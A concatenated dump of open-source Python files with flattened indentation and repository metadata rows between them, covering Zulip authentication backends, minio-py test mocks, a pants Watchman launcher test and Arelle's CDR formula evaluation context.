email_allowed_for_realm(username, self._realm)
validate_email_for_realm(self._realm, username)
except DomainNotAllowedForRealmError:
raise ZulipLDAPException("This email domain isn't allowed in this organization.")
except (DisposableEmailError, EmailContainsPlusError):
raise ZulipLDAPException("Email validation failed.")
# We have valid LDAP credentials; time to create an account.
full_name, short_name = self.get_mapped_name(ldap_user)
try:
full_name = check_full_name(full_name)
except JsonableError as e:
raise ZulipLDAPException(e.msg)
opts = {} # type: Dict[str, Any]
if self._prereg_user:
invited_as = self._prereg_user.invited_as
opts['prereg_user'] = self._prereg_user
opts['is_realm_admin'] = invited_as == PreregistrationUser.INVITE_AS['REALM_ADMIN']
opts['is_guest'] = invited_as == PreregistrationUser.INVITE_AS['GUEST_USER']
opts['default_stream_groups'] = get_default_stream_groups(self._realm)
user_profile = do_create_user(username, None, self._realm, full_name, short_name, **opts)
self.sync_avatar_from_ldap(user_profile, ldap_user)
self.sync_custom_profile_fields_from_ldap(user_profile, ldap_user)
return user_profile, True
class ZulipLDAPUserPopulator(ZulipLDAPAuthBackendBase):
"""Just like ZulipLDAPAuthBackend, but doesn't let you log in. Used
for syncing data like names, avatars, and custom profile fields
from LDAP in `manage.py sync_ldap_user_data` as well as in
registration for organizations that use a different SSO solution
for managing login (often via RemoteUserBackend).
"""
def authenticate(self, *, username: str, password: str, realm: Realm,
return_data: Optional[Dict[str, Any]]=None) -> Optional[UserProfile]:
return None
def sync_user_from_ldap(user_profile: UserProfile) -> bool:
backend = ZulipLDAPUserPopulator()
updated_user = backend.populate_user(backend.django_to_ldap_username(user_profile.email))
if not updated_user:
if settings.LDAP_DEACTIVATE_NON_MATCHING_USERS:
do_deactivate_user(user_profile)
return False
return True
# Quick tool to test whether you're correctly authenticating to LDAP
def query_ldap(email: str) -> List[str]:
values = []
backend = next((backend for backend in get_backends() if isinstance(backend, LDAPBackend)), None)
if backend is not None:
ldap_attrs = _LDAPUser(backend, backend.django_to_ldap_username(email)).attrs
if ldap_attrs is None:
values.append("No such user found")
else:
for django_field, ldap_field in settings.AUTH_LDAP_USER_ATTR_MAP.items():
value = ldap_attrs.get(ldap_field, ["LDAP field not present", ])[0]
if django_field == "avatar":
if isinstance(value, bytes):
value = "(An avatar image file)"
values.append("%s: %s" % (django_field, value))
if settings.LDAP_EMAIL_ATTR is not None:
values.append("%s: %s" % ('email', ldap_attrs[settings.LDAP_EMAIL_ATTR][0]))
else:
values.append("LDAP backend not configured on this server.")
return values
class DevAuthBackend(ZulipAuthMixin):
"""Allow logging in as any user without a password. This is used for
convenience when developing Zulip, and is disabled in production."""
def authenticate(self, *, dev_auth_username: str, realm: Realm,
return_data: Optional[Dict[str, Any]]=None) -> Optional[UserProfile]:
if not dev_auth_enabled(realm):
return None
return common_get_active_user(dev_auth_username, realm, return_data=return_data)
def redirect_deactivated_user_to_login() -> HttpResponseRedirect:
# Specifying the template name makes sure that the user is not redirected to dev_login in case of
# a deactivated account on a test server.
login_url = reverse('zerver.views.auth.login_page', kwargs = {'template_name': 'zerver/login.html'})
redirect_url = login_url + '?is_deactivated=true'
return HttpResponseRedirect(redirect_url)
def social_associate_user_helper(backend: BaseAuth, return_data: Dict[str, Any],
*args: Any, **kwargs: Any) -> Optional[UserProfile]:
"""Responsible for doing the Zulip-account lookup and validation parts
of the Zulip Social auth pipeline (similar to the authenticate()
methods in most other auth backends in this file).
Returns a UserProfile object for successful authentication, and None otherwise.
"""
subdomain = backend.strategy.session_get('subdomain')
try:
realm = get_realm(subdomain)
except Realm.DoesNotExist:
return_data["invalid_realm"] = True
return None
return_data["realm_id"] = realm.id
if not auth_enabled_helper([backend.auth_backend_name], realm):
return_data["auth_backend_disabled"] = True
return None
if 'auth_failed_reason' in kwargs.get('response', {}):
return_data["social_auth_failed_reason"] = kwargs['response']["auth_failed_reason"]
return None
elif hasattr(backend, 'get_verified_emails'):
# Some social backends, like GitHubAuthBackend, don't
# guarantee that the `details` data is validated (i.e., it's
# possible users can put any string they want in the "email"
# field of the `details` object). For those backends, we have
# custom per-backend code to properly fetch only verified
# email addresses from the appropriate third-party API.
verified_emails = backend.get_verified_emails(*args, **kwargs)
verified_emails_length = len(verified_emails)
if verified_emails_length == 0:
# TODO: Provide a nice error message screen to the user
# for this case, rather than just logging a warning.
logging.warning("Social auth (%s) failed because user has no verified emails" %
(backend.auth_backend_name,))
return_data["email_not_verified"] = True
return None
if verified_emails_length == 1:
chosen_email = verified_emails[0]
else:
chosen_email = backend.strategy.request_data().get('email')
if not chosen_email:
return render(backend.strategy.request, 'zerver/social_auth_select_email.html', context = {
'primary_email': verified_emails[0],
'verified_non_primary_emails': verified_emails[1:],
'backend': 'github'
})
try:
validate_email(chosen_email)
except ValidationError:
return_data['invalid_email'] = True
return None
if chosen_email not in verified_emails:
# If a user edits the submit value for the choose email form, we might
# end up with a wrong email associated with the account. The below code
# takes care of that.
logging.warning("Social auth (%s) failed because user has no verified"
" emails associated with the account" %
(backend.auth_backend_name,))
return_data["email_not_associated"] = True
return None
validated_email = chosen_email
else: # nocoverage
# This code path isn't used by GitHubAuthBackend
validated_email = kwargs["details"].get("email")
if not validated_email: # nocoverage
# This code path isn't used with GitHubAuthBackend, but may be relevant for other
# social auth backends.
return_data['invalid_email'] = True
return None
return_data["valid_attestation"] = True
return_data['validated_email'] = validated_email
user_profile = common_get_active_user(validated_email, realm, return_data)
if 'fullname' in kwargs["details"]:
return_data["full_name"] = kwargs["details"]["fullname"]
else:
# If we add support for any of the social auth backends that
# don't provide this feature, we'll need to add code here.
raise AssertionError("Social auth backend doesn't provide fullname")
return user_profile
@partial
def social_auth_associate_user(
backend: BaseAuth,
*args: Any,
**kwargs: Any) -> Union[HttpResponse, Dict[str, Any]]:
"""A simple wrapper function to reformat the return data from
social_associate_user_helper as a dictionary. The
python-social-auth infrastructure will then pass those values into
later stages of settings.SOCIAL_AUTH_PIPELINE, such as
social_auth_finish, as kwargs.
"""
partial_token = backend.strategy.request_data().get('partial_token')
return_data = {} # type: Dict[str, Any]
user_profile = social_associate_user_helper(
backend, return_data, *args, **kwargs)
if type(user_profile) == HttpResponse:
return user_profile
else:
return {'user_profile': user_profile,
'return_data': return_data,
'partial_token': partial_token,
'partial_backend_name': backend}
def social_auth_finish(backend: Any,
details: Dict[str, Any],
response: HttpResponse,
*args: Any,
**kwargs: Any) -> Optional[UserProfile]:
"""Given the determination in social_auth_associate_user for whether
the user should be authenticated, this takes care of actually
logging in the user (if appropriate) and redirecting the browser
to the appropriate next page depending on the situation. Read the
comments below as well as login_or_register_remote_user in
`zerver/views/auth.py` for the details on how that dispatch works.
"""
from zerver.views.auth import (login_or_register_remote_user,
redirect_and_log_into_subdomain)
user_profile = kwargs['user_profile']
return_data = kwargs['return_data']
no_verified_email = return_data.get("email_not_verified")
auth_backend_disabled = return_data.get('auth_backend_disabled')
inactive_user = return_data.get('inactive_user')
inactive_realm = return_data.get('inactive_realm')
invalid_realm = return_data.get('invalid_realm')
invalid_email = return_data.get('invalid_email')
auth_failed_reason = return_data.get("social_auth_failed_reason")
email_not_associated = return_data.get("email_not_associated")
if invalid_realm:
from zerver.views.auth import redirect_to_subdomain_login_url
return redirect_to_subdomain_login_url()
if inactive_user:
return redirect_deactivated_user_to_login()
if auth_backend_disabled or inactive_realm or no_verified_email or email_not_associated:
# Redirect to login page. We can't send to registration
# workflow with these errors. We will redirect to login page.
return None
if invalid_email:
# In case of invalid email, we will end up on registration page.
# This seems better than redirecting to login page.
logging.warning(
"{} got invalid email argument.".format(backend.auth_backend_name)
)
return None
if auth_failed_reason:
logging.info(auth_failed_reason)
return None
# Structurally, all the cases where we don't have an authenticated
# email for the user should be handled above; this assertion helps
# prevent any violations of that contract from resulting in a user
# being incorrectly authenticated.
assert return_data.get('valid_attestation') is True
strategy = backend.strategy # type: ignore # This comes from Python Social Auth.
email_address = return_data['validated_email']
full_name = return_data['full_name']
is_signup = strategy.session_get('is_signup') == '1'
redirect_to = strategy.session_get('next')
realm = Realm.objects.get(id=return_data["realm_id"])
multiuse_object_key = strategy.session_get('multiuse_object_key', '')
mobile_flow_otp = strategy.session_get('mobile_flow_otp')
# At this point, we have now confirmed that the user has
# demonstrated control over the target email address.
#
# The next step is to call login_or_register_remote_user, but
# there are two code paths here because of an optimization to save
# a redirect on mobile.
if mobile_flow_otp is not None:
# For mobile app authentication, login_or_register_remote_user
# will redirect to a special zulip:// URL that is handled by
# the app after a successful authentication; so we can
# redirect directly from here, saving a round trip over what
# we need to do to create session cookies on the right domain
# in the web login flow (below).
return login_or_register_remote_user(strategy.request, email_address,
user_profile, full_name,
mobile_flow_otp=mobile_flow_otp,
is_signup=is_signup,
redirect_to=redirect_to)
# If this authentication code were executing on
# subdomain.zulip.example.com, we would just call
# login_or_register_remote_user as in the mobile code path.
# However, because third-party SSO providers generally don't allow
# wildcard addresses in their redirect URLs, for multi-realm
# servers, we will have just completed authentication on e.g.
# auth.zulip.example.com (depending on
# settings.SOCIAL_AUTH_SUBDOMAIN), which cannot store cookies on
# the subdomain.zulip.example.com domain. So instead we serve a
# redirect (encoding the authentication result data in a
# cryptographically signed token) to a route on
# subdomain.zulip.example.com that will verify the signature and
# then call login_or_register_remote_user.
return redirect_and_log_into_subdomain(realm, full_name, email_address,
is_signup=is_signup,
redirect_to=redirect_to,
multiuse_object_key=multiuse_object_key)
class SocialAuthMixin(ZulipAuthMixin):
auth_backend_name = "undeclared"
# Used to determine how to order buttons on login form, backend with
# higher sort order are displayed first.
sort_order = 0
def auth_complete(self, *args: Any, **kwargs: Any) -> Optional[HttpResponse]:
"""This is a small wrapper around the core `auth_complete` method of
python-social-auth, designed primarily to prevent 500s for
exceptions in the social auth code from situations that are
really user errors. Returning `None` from this function will
redirect the browser to the login page.
"""
try:
# Call the auth_complete method of social_core.backends.oauth.BaseOAuth2
return super().auth_complete(*args, **kwargs) # type: ignore # monkey-patching
except AuthFailed as e:
# When a user's social authentication fails (e.g. because
# they did something funny with reloading in the middle of
# the flow), don't throw a 500, just send them back to the
# login page and record the event at the info log level.
logging.info(str(e))
return None
except SocialAuthBaseException as e:
# Other python-social-auth exceptions are likely
# interesting enough that we should log a warning.
logging.warning(str(e))
return None
class GitHubAuthBackend(SocialAuthMixin, GithubOAuth2):
auth_backend_name = "GitHub"
sort_order = 100
def get_verified_emails(self, *args: Any, **kwargs: Any) -> List[str]:
access_token = kwargs["response"]["access_token"]
try:
emails = self._user_data(access_token, '/emails')
except (HTTPError, ValueError, TypeError): # nocoverage
# We don't really need an explicit test for this code
# path, since the outcome will be the same as any other
# case without any verified emails
emails = []
verified_emails = [] # type: List[str]
for email_obj in self.filter_usable_emails(emails):
# social_associate_user_helper assumes that the first email in
# verified_emails is primary.
if email_obj.get("primary"):
verified_emails.insert(0, email_obj["email"])
else:
verified_emails.append(email_obj["email"])
return verified_emails
def filter_usable_emails(self, emails: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
# We only let users login using email addresses that are verified
# by GitHub, because the whole point is for the user to
# demonstrate that they control the target email address. We also
# disallow the @noreply.github.com email addresses, because
# structurally, we only want to allow email addresses that can
# receive emails, and those cannot.
return [
email for email in emails
if email.get('verified') and not email["email"].endswith("@noreply.github.com")
]
def user_data(self, access_token: str, *args: Any, **kwargs: Any) -> Dict[str, str]:
"""This patched user_data function lets us combine together the 3
social auth backends into a single Zulip backend for GitHub Oauth2"""
team_id = settings.SOCIAL_AUTH_GITHUB_TEAM_ID
org_name = settings.SOCIAL_AUTH_GITHUB_ORG_NAME
if team_id is None and org_name is None:
# I believe this can't raise AuthFailed, so we don't try to catch it here.
return super().user_data(
access_token, *args, **kwargs
)
elif team_id is not None:
backend = GithubTeamOAuth2(self.strategy, self.redirect_uri)
try:
return backend.user_data(access_token, *args, **kwargs)
except AuthFailed:
return dict(auth_failed_reason="GitHub user is not member of required team")
elif org_name is not None:
backend = GithubOrganizationOAuth2(self.strategy, self.redirect_uri)
try:
return backend.user_data(access_token, *args, **kwargs)
except AuthFailed:
return dict(auth_failed_reason="GitHub user is not member of required organization")
raise AssertionError("Invalid configuration")
class AzureADAuthBackend(SocialAuthMixin, AzureADOAuth2):
sort_order = 50
auth_backend_name = "AzureAD"
AUTH_BACKEND_NAME_MAP = {
'Dev': DevAuthBackend,
'Email': EmailAuthBackend,
'Google': GoogleMobileOauth2Backend,
'LDAP': ZulipLDAPAuthBackend,
'RemoteUser': ZulipRemoteUserBackend,
} # type: Dict[str, Any]
OAUTH_BACKEND_NAMES = ["Google"] # type: List[str]
SOCIAL_AUTH_BACKENDS = [] # type: List[BaseOAuth2]
# Automatically add all of our social auth backends to relevant data structures.
for social_auth_subclass in SocialAuthMixin.__subclasses__():
AUTH_BACKEND_NAME_MAP[social_auth_subclass.auth_backend_name] = social_auth_subclass
if issubclass(social_auth_subclass, BaseOAuth2):
OAUTH_BACKEND_NAMES.append(social_auth_subclass.auth_backend_name)
SOCIAL_AUTH_BACKENDS.append(social_auth_subclass)
| apache-2.0 | -2,213,531,157,359,025,700 | 46.083333 | 118 | 0.651349 | false |
NitishT/minio-py | tests/unit/minio_mocks.py | 1 | 2552 | # -*- coding: utf-8 -*-
# Minio Python Library for Amazon S3 Compatible Cloud Storage,
# (C) 2015,2016 Minio, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from minio.compat import _is_py3
from minio.fold_case_dict import FoldCaseDict
if _is_py3:
import http.client as httplib
else:
import httplib
from nose.tools import eq_
class MockResponse(object):
def __init__(self, method, url, headers, status_code, response_headers=None,
content=None):
self.method = method
self.url = url
self.request_headers = FoldCaseDict()
for header in headers:
self.request_headers[header] = headers[header]
self.status = status_code
self.headers = response_headers
self.data = content
if content is None:
self.reason = httplib.responses[status_code]
# noinspection PyUnusedLocal
def read(self, amt=1024):
return self.data
def mock_verify(self, method, url, headers):
eq_(self.method, method)
eq_(self.url, url)
for header in headers:
eq_(self.request_headers[header], headers[header])
# noinspection PyUnusedLocal
def stream(self, chunk_size=1, decode_unicode=False):
if self.data is not None:
return iter(bytearray(self.data, 'utf-8'))
return iter([])
# dummy release connection call.
def release_conn(self):
return
class MockConnection(object):
def __init__(self):
self.requests = []
def mock_add_request(self, request):
self.requests.append(request)
# noinspection PyUnusedLocal
def request(self, method, url, headers, redirect=False):
return_request = self.requests.pop(0)
return_request.mock_verify(method, url, headers)
return return_request
# noinspection PyRedeclaration,PyUnusedLocal,PyUnusedLocal
def urlopen(self, method, url, headers, preload_content=False, body=None,
redirect=False):
return self.request(method, url, headers)
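# Illustrative test usage of these mocks (the surrounding test harness is
# assumed, not part of this module): queue a response, then let the client
# code "request" it and have the expectations verified.
#   conn = MockConnection()
#   conn.mock_add_request(MockResponse('GET', 'http://localhost:9000/bucket',
#                                      {'User-Agent': 'minio-py'}, 200))
#   response = conn.urlopen('GET', 'http://localhost:9000/bucket',
#                           {'User-Agent': 'minio-py'})
#   assert response.status == 200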
| apache-2.0 | -269,605,990,221,122,240 | 32.142857 | 80 | 0.668887 | false |
foursquare/pants | tests/python/pants_test/pantsd/test_watchman_launcher.py | 1 | 2226 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import mock
from pants.pantsd.watchman import Watchman
from pants.pantsd.watchman_launcher import WatchmanLauncher
from pants_test.test_base import TestBase
class TestWatchmanLauncher(TestBase):
def watchman_launcher(self, cli_options=()):
bootstrap_options = self.get_bootstrap_options(cli_options)
return WatchmanLauncher.create(bootstrap_options)
def create_mock_watchman(self, is_alive):
mock_watchman = mock.create_autospec(Watchman, spec_set=False)
mock_watchman.ExecutionError = Watchman.ExecutionError
mock_watchman.is_alive.return_value = is_alive
return mock_watchman
def test_maybe_launch(self):
mock_watchman = self.create_mock_watchman(False)
wl = self.watchman_launcher()
wl.watchman = mock_watchman
self.assertTrue(wl.maybe_launch())
mock_watchman.is_alive.assert_called_once_with()
mock_watchman.launch.assert_called_once_with()
def test_maybe_launch_already_alive(self):
mock_watchman = self.create_mock_watchman(True)
wl = self.watchman_launcher()
wl.watchman = mock_watchman
self.assertTrue(wl.maybe_launch())
mock_watchman.is_alive.assert_called_once_with()
self.assertFalse(mock_watchman.launch.called)
def test_maybe_launch_error(self):
mock_watchman = self.create_mock_watchman(False)
mock_watchman.launch.side_effect = Watchman.ExecutionError('oops!')
wl = self.watchman_launcher()
wl.watchman = mock_watchman
with self.assertRaises(wl.watchman.ExecutionError):
wl.maybe_launch()
mock_watchman.is_alive.assert_called_once_with()
mock_watchman.launch.assert_called_once_with()
def test_watchman_property(self):
wl = self.watchman_launcher()
self.assertIsInstance(wl.watchman, Watchman)
def test_watchman_socket_path(self):
expected_path = '/a/shorter/path'
options = ['--watchman-socket-path={}'.format(expected_path)]
wl = self.watchman_launcher(options)
self.assertEquals(wl.watchman._sock_file, expected_path)
| apache-2.0 | 4,364,870,295,606,738,400 | 33.246154 | 82 | 0.738095 | false |
sternshus/arelle2.7 | svr-2.7/arelle/plugin/cdrFormula/cdrContext.py | 1 | 19169 | '''
cdrContext provides the validation and execution context for CDR Formula language expressions.
(c) Copyright 2013 Mark V Systems Limited, California US, All rights reserved.
'''
from collections import OrderedDict
from .cdrParser import astNode
from arelle.ModelFormulaObject import aspectModels, Aspect, aspectStr
from arelle.ModelInstanceObject import ModelFact, ModelDimensionValue
from arelle.FormulaEvaluator import implicitFilter, aspectsMatch
from arelle.ModelValue import QName
from arelle.ModelXbrl import DEFAULT, NONDEFAULT
from arelle import XmlUtil
class CdrContext:
def __init__(self, cdrFormulas, orderedFormulaQnames, modelXbrl=None):
self.modelXbrl = modelXbrl # the DTS and input instance (if any)
self.cdrFormulas = cdrFormulas
self.orderedFormulaQnames = orderedFormulaQnames
        self.evaluationBindings = None
if modelXbrl is not None:
self.formulaOptions = modelXbrl.modelManager.formulaOptions
self.defaultDimensionAspects = set(modelXbrl.qnameDimensionDefaults.keys())
def close(self):
# dereference grammar
        for modelFormula in self.cdrFormulas.values():
for node in modelFormula.prog:
if isinstance(node, astNode):
node.clear()
modelFormula.prog.clear()
self.__dict__.clear() # delete local attributes
class EvaluationBindings:
def __init__(self, cdrContext):
self.sCtx = cdrContext
        self.parentEvaluationBindings = cdrContext.evaluationBindings
cdrContext.evaluationBindings = self
self.evaluationBindings = []
self.nodeBindings = {}
self.withRestrictionBindings = []
self.aspectBoundFacts = {}
self.aggregationNode = None
self.isValuesIteration = False
def close(self):
if self.sCtx.evaluationBindings is self:
self.sCtx.evaluationBindings = self.parentEvaluationBindings
for binding in self.evaluationBindings:
binding.close()
self.__dict__.clear() # dereference
def nodeBinding(self, node, isWithRestrictionNode=False):
if node in self.nodeBindings:
return self.nodeBindings[node]
if self.aggregationNode and self.aggregationNode not in self.nodeBindings and not self.isValuesIteration:
agrgBalNode = EvaluationBinding(self, node, isBalancingBinding=True)
self.nodeBindings[self.aggregationNode] = agrgBalNode
nodeBinding = EvaluationBinding(self, node, isWithRestrictionNode=isWithRestrictionNode)
self.nodeBindings[node] = nodeBinding
self.evaluationBindings.append(nodeBinding)
return nodeBinding
def forBinding(self, node):
if node in self.nodeBindings:
return self.nodeBindings[node]
nodeBinding = ForBinding(self, node)
self.nodeBindings[node] = nodeBinding
self.evaluationBindings.append(nodeBinding)
return nodeBinding
def next(self, iterateAbove=-1, bindingsLen=-1):
# iterate evaluation bindings
if not self.evaluationBindings:
raise StopIteration
evaluationBindingsToReset = []
if bindingsLen == -1:
bindingsLen = len(self.evaluationBindings)
for iB in range(bindingsLen - 1, iterateAbove, -1):
evalBinding = self.evaluationBindings[iB]
try:
evalBinding.next()
for evalBinding in evaluationBindingsToReset:
evalBinding.reset()
return # hsB has another value to return
except StopIteration:
evaluationBindingsToReset.insert(0, evalBinding) # reset after outer iterator advanced
raise StopIteration # no more outermost loop of iteration
@property
def boundFacts(self):
return [binding.yieldedFact
for binding in self.evaluationBindings
if isinstance(binding, EvaluationBinding) and
not binding.fallenBack and binding.yieldedFact is not None]
class EvaluationBinding:
def __init__(self, evaluationBindings, node, fallback=False, isWithRestrictionNode=False, isBalancingBinding=False):
self.evaluationBindings = evaluationBindings
self.sCtx = evaluationBindings.sCtx
self.node = node
self.isWithRestrictionNode = isWithRestrictionNode
self.isBalancingBinding = isBalancingBinding
self.isValuesIteration = evaluationBindings.isValuesIteration
self.fallback = fallback
self.aspectsQualified = set()
self.aspectsDefined = set(aspectModels["dimensional"])
if evaluationBindings.withRestrictionBindings:
withAspectsQualified = evaluationBindings.withRestrictionBindings[-1].aspectsQualified
else:
withAspectsQualified = set()
# axes from macros need to be expanded
self.aspectAxisTuples = []
self.axesAspects = set()
for hsAxis in node.axes:
if hsAxis.aspect: # no aspect if just a where clause
aspect = evaluate(hsAxis.aspect, self.sCtx, value=True)
if aspect not in self.aspectsDefined and not isinstance(aspect, QName):
raise CdrException(node, "cdr:aspectValue",
_("Evaluation aspect indeterminate %(aspect)s"),
aspect=aspect)
if isinstance(aspect, QName):
if aspect not in self.sCtx.dimensionIsExplicit: # probably dynamic macro aspect
concept = self.sCtx.modelXbrl.qnameConcepts.get(aspect)
if concept is None or not concept.isDimensionItem:
raise CdrException(node, "cdrBinding:axisNotDimension",
_("Axis aspect is not a dimension in the DTS %(aspect)s"),
aspect=aspect)
self.sCtx.dimensionIsExplicit[aspect] = concept.isExplicitDimension
self.axesAspects.add(aspect) # resolved aspect value
self.aspectAxisTuples.append( (aspect, hsAxis) )
self.aspectsQualified = self.axesAspects | withAspectsQualified
self.reset() # will raise StopIteration if no facts or fallback
def close(self):
self.__dict__.clear() # dereference
@property
def value(self):
if self.fallenBack:
return None
if self.yieldedFact is not None:
return self.yieldedFact.xValue
return None
@property
def var(self): # used in implicitFilter winnowing trace
return []
@property
def qname(self): # used in implicitFilter winnowing trace
return ''
def __repr__(self):
if self.fallenBack:
return "fallen-back"
if self.yieldedFact is not None:
return self.yieldedFact.__repr__()
return "none"
def reset(self):
# start with all facts
if self.evaluationBindings.withRestrictionBindings:
facts = self.evaluationBindings.withRestrictionBindings[-1].yieldedFactsPartition
else:
facts = self.sCtx.modelXbrl.nonNilFactsInInstance
if self.sCtx.formulaOptions.traceVariableFilterWinnowing:
self.sCtx.modelXbrl.info("cdr:trace",
_("Evaluation %(variable)s binding: start with %(factCount)s facts"),
sourceFileLine=self.node.sourceFileLine, variable=str(self.node), factCount=len(facts))
# filter by binding aspects
facts = self.filterFacts(facts)
for fact in facts:
if fact.isItem:
self.aspectsDefined |= fact.context.dimAspects(self.sCtx.defaultDimensionAspects)
self.unQualifiedAspects = self.aspectsDefined - self.aspectsQualified - {Aspect.DIMENSIONS}
# implicitly filter by prior uncoveredAspectFacts
        if self.evaluationBindings.aspectBoundFacts and not self.isValuesIteration:
            facts = implicitFilter(self.sCtx, self, facts, self.unQualifiedAspects, self.evaluationBindings.aspectBoundFacts)
if self.sCtx.formulaOptions.traceVariableFiltersResult:
self.sCtx.modelXbrl.info("cdr:trace",
_("Evaluation %(variable)s binding: filters result %(factCount)s facts"),
sourceFileLine=self.node.sourceFileLine, variable=str(self.node), factCount=len(facts))
if self.isWithRestrictionNode: # if withNode, combine facts into partitions by qualified aspects
factsPartitions = []
for fact in facts:
matched = False
for partition in factsPartitions:
if aspectsMatch(self.sCtx, fact, partition[0], self.aspectsQualified):
partition.append(fact)
matched = True
break
if not matched:
factsPartitions.append([fact,])
self.factIter = iter([set(p) for p in factsPartitions]) # must be sets
self.yieldedFactsPartition = []
else: # just a hyperspaceExpression node
self.factIter = iter(facts)
self.yieldedFact = None
self.fallenBack = False
self.next()
def next(self): # will raise StopIteration if no (more) facts or fallback
uncoveredAspectFacts = self.evaluationBindings.aspectBoundFacts
if self.yieldedFact is not None and self.evaluationBindings.aggregationNode is None:
for aspect, priorFact in self.evaluationContributedUncoveredAspects.items():
if priorFact == "none":
del uncoveredAspectFacts[aspect]
else:
uncoveredAspectFacts[aspect] = priorFact
self.evaluationContributedUncoveredAspects.clear()
try:
if self.isWithRestrictionNode:
self.yieldedFactsPartition = next(self.factIter)
for self.yieldedFact in self.yieldedFactsPartition:
break
else:
self.yieldedFact = next(self.factIter)
self.evaluationContributedUncoveredAspects = {}
if not self.isValuesIteration:
for aspect in self.unQualifiedAspects: # covered aspects may not be defined e.g., test 12062 v11, undefined aspect is a complemented aspect
if uncoveredAspectFacts.get(aspect) is None:
self.evaluationContributedUncoveredAspects[aspect] = uncoveredAspectFacts.get(aspect,"none")
uncoveredAspectFacts[aspect] = None if aspect in self.axesAspects else self.yieldedFact
if self.sCtx.formulaOptions.traceVariableFiltersResult:
self.sCtx.modelXbrl.info("cdr:trace",
_("Evaluation %(variable)s: bound value %(result)s"),
sourceFileLine=self.node.sourceFileLine, variable=str(self.node), result=str(self.yieldedFact))
except StopIteration:
self.yieldedFact = None
if self.isWithRestrictionNode:
self.yieldedFactsPartition = []
if self.fallback and not self.fallenBack:
self.fallenBack = True
if self.sCtx.formulaOptions.traceVariableExpressionResult:
self.sCtx.modelXbrl.info("cdr:trace",
_("Evaluation %(variable)s: fallbackValue result %(result)s"),
sourceFileLine=self.node.sourceFileLine, variable=str(self.node), result=0)
else:
raise StopIteration
def filterFacts(self, facts):
modelXbrl = self.sCtx.modelXbrl
# process with bindings and this node
for i, aspectAxis in enumerate(self.aspectAxisTuples):
aspect, hsAxis = aspectAxis
# value is an astHyperspaceAxis
if hsAxis.restriction:
restriction = evaluate(hsAxis.restriction, self.sCtx, value=True)
if aspect == Aspect.CONCEPT:
aspectQualifiedFacts = [modelXbrl.factsByQname[qn]
for qn in restriction
if isinstance(qn, QName)]
facts = facts & set.union(*aspectQualifiedFacts) if aspectQualifiedFacts else set()
elif aspect == Aspect.PERIOD:
facts = set(f for f in facts if isPeriodEqualTo(f, restriction))
elif aspect == Aspect.ENTITY_IDENTIFIER:
facts = set(f for f in facts if isEntityIdentifierEqualTo(f, restriction))
elif isinstance(aspect, QName):
if self.sCtx.dimensionIsExplicit.get(aspect):
# explicit dim facts (value None will match the default member)
aspectQualifiedFacts = []
for qn in restriction:
if self.isBalancingBinding: # complement dimension for aggregation balancing binding
if isinstance(qn, QName) or qn is NONDEFAULT:
qn = DEFAULT
else:
qn = NONDEFAULT
if qn is NONE:
qn = DEFAULT
elif not (isinstance(qn, QName) or qn is DEFAULT or qn is NONDEFAULT):
continue
aspectQualifiedFacts.append(modelXbrl.factsByDimMemQname(aspect, qn))
facts = facts & set.union(*aspectQualifiedFacts) if aspectQualifiedFacts else set()
else:
facts = facts & set(fact
for fact in facts
for typedDimValue in hsAxis.restriction
if typedDimTest(aspect, typedDimValue, fact))
if hsAxis.whereExpr and facts: # process where against facts passing restriction
whereMatchedFacts = set()
asVars = set()
for fact in facts:
for asAspectAxis in self.aspectAxisTuples[0:i+1]:
asAspect, asHsAxis = asAspectAxis
if asHsAxis.asVariableName:
self.sCtx.localVariables[asHsAxis.asVariableName] = factAspectValue(fact, asAspect)
asVars.add(asHsAxis.asVariableName)
self.sCtx.localVariables["item"] = fact
if evaluate(hsAxis.whereExpr, self.sCtx) ^ self.isBalancingBinding:
whereMatchedFacts.add(fact)
del self.sCtx.localVariables["item"]
for asVar in asVars:
del self.sCtx.localVariables[asVar]
facts = whereMatchedFacts
if self.sCtx.formulaOptions.traceVariableFilterWinnowing:
self.sCtx.modelXbrl.info("cdr:trace",
_("Evaluation %(variable)s: %(filter)s filter passes %(factCount)s facts"),
sourceFileLine=self.node.sourceFileLine, variable=str(self.node), filter=aspectStr(aspect), factCount=len(facts))
if self.node.isClosed: # winnow out non-qualified dimension breakdowns
facts = facts - set(fact
for fact in facts
if fact.dimAspects - self.aspectsQualified )
if self.sCtx.formulaOptions.traceVariableFilterWinnowing:
self.sCtx.modelXbrl.info("cdr:trace",
_("Evaluation %(variable)s: closed selection filter passes %(factCount)s facts"),
sourceFileLine=self.node.sourceFileLine, variable=str(self.node), factCount=len(facts))
return facts
def isPeriodEqualTo(fact, periodRestriction):
context = fact.context
if context is not None:
for period in periodRestriction:
if ((context.isInstantPeriod and context.instantDatetime == period) or
(context.isStartEndPeriod and (context.startDatetime, context.endDatetime) == period) or
(context.isForeverPeriod and period == (None, None))):
return True
return False
def isEntityIdentifierEqualTo(fact, entityIdentifierRestriction):
context = fact.context
if context is not None:
for entityIdentifier in entityIdentifierRestriction:
if context.entityIdentifier == entityIdentifier:
return True
return False
def typedDimTest(aspect, value, fact):
if fact.context is None:
return False
modelDim = fact.context.dimValue(aspect)
if isinstance(modelDim, ModelDimensionValue):
memElt = modelDim.typedMember
if memElt is None or memElt.get("{http://www.w3.org/2001/XMLSchema-instance}nil") == "true":
return value is NONE or value is DEFAULT
if value is NONDEFAULT:
return True
return memElt.textValue == value
else:
return value is NONE or value is DEFAULT
class ForBinding:
def __init__(self, hyperspaceBindings, node):
self.hyperspaceBindings = hyperspaceBindings
self.sCtx = hyperspaceBindings.sCtx
self.node = node
self.collection = evaluate(node.collectionExpr, self.sCtx)
self.reset() # will raise StopIteration if no for items
def close(self):
self.__dict__.clear() # dereference
@property
def value(self):
if self.yieldedValue is not None:
return self.yieldedValue
return None
def __repr__(self):
if self.yieldedValue is not None:
return self.yieldedValue.__repr__()
return "none"
def reset(self):
self.forIter = iter(self.collection)
self.yieldedValue = None
self.next()
def next(self): # will raise StopIteration if no (more) facts or fallback
try:
self.yieldedValue = next(self.forIter)
